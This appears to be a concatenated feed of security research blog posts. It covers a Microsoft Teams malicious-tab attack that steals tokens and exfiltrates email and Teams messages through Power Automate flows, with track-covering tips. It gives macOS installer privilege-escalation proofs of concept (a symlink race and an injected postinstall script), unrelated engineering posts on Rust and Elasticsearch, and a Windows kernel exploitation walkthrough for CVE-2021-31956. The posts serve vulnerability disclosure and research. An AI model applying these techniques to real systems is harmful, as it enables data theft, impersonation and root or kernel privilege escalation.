For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input, and perform the actions we want (send emails, teams messages, downloads files, etc). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have the flow created, we need to know how we can create it, and share it with ourselves as the attacker, using the tokens we’ve stolen and what those requests look like. Luckily in our case, it is just a couple of simple requests.

  1. A POST request, containing JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. The pseudocode for our attack looks like this:

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. Low and slow methods like having flows trigger on a RSS feed update (30 minute minimum period), or on a schedule, or automatically (like when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross referenced with which users have flows created under their name at admin.powerplatform.microsoft.com

organization admin portal

Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enable them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded-up until an attacker is exfiltrating emails, Teams messages, OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020–9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020–9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/”
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won’t spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon”;
done
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020–9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil — expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo “#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)” > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalates privileges to root when a package that does so is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox, though, it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper righthand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

By: Alan Ning
6 May 2021 at 15:31

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsoleted metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because in our environment, its network performance outstripped other languages that equalled its speed to production. We were able to implement, test and deploy this change across all of the T.io platform within a week.

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics as an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to large wastage. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics. (See our other post on Rust evaluations) The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU reduced from 800m to 200m core
Per pod, average memory reduced from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPU and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced JS-based StatsD filter with Rust and received huge performance improvement.
  • At scale, even small optimization can result in a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Scaling Tenable.io — From Site to Cell

By: Alan Ning
4 March 2021 at 15:46

Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabytes-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when the index reached the scale of hundreds of nodes per cluster, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and affecting the user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, which a site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance to be used by geographically similar customers. As data pressure increases, however, horizontal scaling will cause instability, which will in turn cause instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrate from site to cell, where customer with large dataset may get their own Elasticsearch cluster.

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:
  • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
  • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

2. A Spark job that can:

  • Query specific customer data
  • Using parallelized scrolls, read the Spark dataframes from the monolith cluster
  • Map the Spark dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

Elasticsearch proxy encapsulate all customer routing logic from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected a X-CUSTOMER-ID HTTP header in each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer to cluster mapping, and forwarded the request on to the correct cluster.

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. This is an example directly copied from Elasticsearch documentation:

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:

To optimize the backfill performance, we performed steps similar to the ones taken by Soundcloud. Specifically, we found the following settings the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.

Performance Improvement

Since we started this effort, we have noticed drastic performance improvement. Elasticsearch scroll speed saw up to 15X performance improvement, and queries decreased in latency of up to several orders of magnitude.

The chart below is a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffers slow performance from the frequent resource contention with other customers, and it is further slowed by our fairness algorithm’s throttling. After the customer is migrated to the cell cluster, the same scroll request completes in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us new powerful tools to shard customer data. The resharding process is streamlined to an easy, safe and zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scrolls performance improved by 15x, and queries latency reduced by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

